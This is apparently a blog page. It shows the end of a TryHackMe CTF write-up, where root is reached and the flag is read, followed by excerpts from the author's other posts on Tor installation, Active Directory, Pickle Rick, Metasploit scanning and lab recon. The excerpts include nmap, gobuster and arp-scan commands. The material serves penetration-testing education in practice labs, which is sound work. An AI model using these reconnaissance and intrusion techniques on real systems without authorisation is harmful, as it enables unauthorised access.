 Swap usage:  0%               IP address for docker0: 172.17.0.1

 => There is 1 zombie process.

 * Canonical Livepatch is available for installation.

  - Reduce system reboots and improve kernel security. Activate at:

    https://ubuntu.com/livepatch

0 packages can be updated.

0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Mon Aug 3 19:59:17 2020 from 10.6.2.56

root@internal:~# ls

root.txt snap

root@internal:~# cat root.txt

Gotcha! we have discovered root flag

THM{d0ck3r_d3str0y3r}

 Thank you very much for reading this article


I hope you liked and learned something new

This article has been done with ethical proposes

Good Hack

Comments

Post a Comment

Entradas Populares

TOR WEB BROWSER

Image
  TOR WEB BROWSER TOR INSTALLATION First of all; we're going to this link from the oficial webpage: https://www.torproject.org/es/download/   where we have to download this version our laptop, Windows and Linux but in my case I've had to download for Windows 10. When the program is installed we will press execute and we'll follow step by step:   We'll open and we'll see this image where you have to select the language and select ok to continue the instal l ation. In addition, we'll select the location wherever you want install the program, but in my case I prefer the default location and you'll able to select wherever you want. Now, we will be started the installation process and when it finished you will be able to see the picture below: TOR CONNECT If the process has been successful, you will be able to connect with the connect button which you can observe in both pictures below: ADD A BRIDGE ...
Read more »

activedirectory

Image
ACTIVEDIRECTORY (TRYHACKME) First of all, let’s go to execute nmap toolkit and we'll be able to start the enumeration of the ports as you can see below with this command: sudo nmap -n -Pn -p- --min-rate 5000 10.10.135.154 -vvv -sC -sV This revealed several open TCP ports with associated services, including: DNS (53),  HTTP  (80),  Kerberos (88),  RPC (135),  NetBIOS-SSN (139),  SMB (445),  RDP (3389),  WS-Management (5985)  LDAP (389, 636, 3268, 3269) Moreover, service and NSE script detection provided valuable information about the services running on these ports, such as IIS 10.0, Microsoft Windows Kerberos , Active Directory LDAP , and Microsoft Terminal Services . The SSL/TLS certificate information on port 3389 indicated the common name AttacktiveDirectory.spookysec.local, reinforcing the target as an Active Directory server. rdp-ntlm-info also provided details about the domain (THM-AD) and computer name (ATTACKTIVEDIREC) as you can se...
Read more »

PICKLE RICK

Image
  PICKLE RICK I'm going to realize the resolution of the machine Level Easy from Tryhackme called  Pickle Rick  which is a machine so easy to realize. First of all,  we can observe that in the picture bellow we have some inforamtion and I'm going to execute control +u  and we can see in the second picture below that we've obtained a  Username. I'm going to gathering information about machine and I have to enter in the Linux terminal and I must introduce this command which you canobserve in the picture below:   gobuster dir -u(url) http://10.10.99.188/ -w(password dictionary)  /usr/share/wordlist/dirb/common.txt -x (formato que quereos que busque) .txt*, .php, .login,  In this case, we can observe that scan has discovered this 4 webpages: /assests /denied.php /index.html /login.php /robots.txt Now, we can see such as the web page from /robots.txt   it seems the password in the picture below. Now, we've discovered this login web page...
Read more »

Metasploit Framework

Image
 METASPLOIT FRAMEWORK USE TO  AUXILIARY MODULE FROM METASPLOIT First of all, I have used the auxiliary modules from Metasploit-Framework which could allow me Scanning, see ports, SO version, vulnerability in applications etc, where you can see at the bottom of the picture if  I use this module whose name is: auxiliary/scanner/discovery/arp_sweep  (To verify the IPs listening in the network) Now, we can observe that when I have selected in the auxiliary module I have had to do this set up  that we can observe in the second page below: INTERFACE : This I've set up the network interface that in my case is the eth0 interface. RHOSTS :This I've set up the IP Address which I am finding out that in my case is 192.168.100.0/24 (all the IP Address from network that could be possible which I am analyzing). THREADS : Are the threads; it's the fast  that I want to analyze the IP Addresses but in my case there are 15 threads because I want to analize as fast as possible...
Read more »

HOSTING

Image
HOSTING First of all, let's go to hosting machine from active directory, for it  using arp-scan to discover active hosts on the local network, identifying 192.168.88.8 as you can see in below. ┌──(kali㉿kali)-[~] └─$ sudo arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:43:73:bc, IPv4: 192.168.88.5 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.8 08:00:27:98:d4:bf PCS Systemtechnik GmbH 192.168.88.9 00:e0:4c:69:66:4a REALTEK SEMICONDUCTOR CORP. 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.075 seconds (123.37 hosts/sec). 3 responded ┌──(kali㉿kali)-[~] └─$ ping -c1 192.168.88.8 PING 192.168.88.8 (192.168.88.8) 56(84) bytes of data. 64 bytes from 192.168.88.8: icmp_seq=1 ttl=128...
Read more »

LOVE

Image
BUSCALOVE First of all, I am going to do this machine from cybersecurity labs called BuscaLove which is easy Level. For it, let’s go to open Linux terminal and we have to write the command when we can see in the picture below. cd Descargas In addition, we have to depress the unzip file whose name’s buscalove.zip you can see in the picture below. Now we have to deploy the vulnerability machine whose command is sudo bash auto_deploy.sh buscalove.tar we can see in the picture below. On the other hand, to start the attack at virtual machine, we must verify if the attacker machine is in the same range of IP Address and we have to introduce this command which is ping -c 3 172.18.0.2 we can see in the picture below. As I,ve just seen the IP Address it’s in the same range of my IP Address we have to introduce the command with nmap tool which is nmap -n -Pn 172.18.0.2 -p- - -min-rate 4000 -vvv( here you can see in this picture the scanner) but I’ve got it 2 ports: 22: open ssh 80: open http No...
Read more »

CHANGE MACHINE

Image
CHANGE  First of all, let's go to hosting machine from active directory, for it  using  arp-scan  to discover active hosts on the local network, identifying  192.168.88.8   as you can see in below . ┌──(root㉿kali)-[/home/luis] └─# arp-scan -I eth0 --localnet Interface: eth0, type: EN10MB, MAC: 08:00:27:4d:8a:0f, IPv4: 192.168.88.6 WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.88.1 d8:44:89:50:2d:a3 (Unknown) 192.168.88.4 00:e0:4c:97:01:a7 (Unknown) 192.168.88.5 00:d8:61:fa:c0:4a (Unknown) 192.168.88.7 08:00:27:b1:ae:9f (Unknown) 4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.848 seconds (138.53 hosts/sec). 4 responded Now, let's go execute nmap command to identify alives ports and version with this host  192.168.88...
Read more »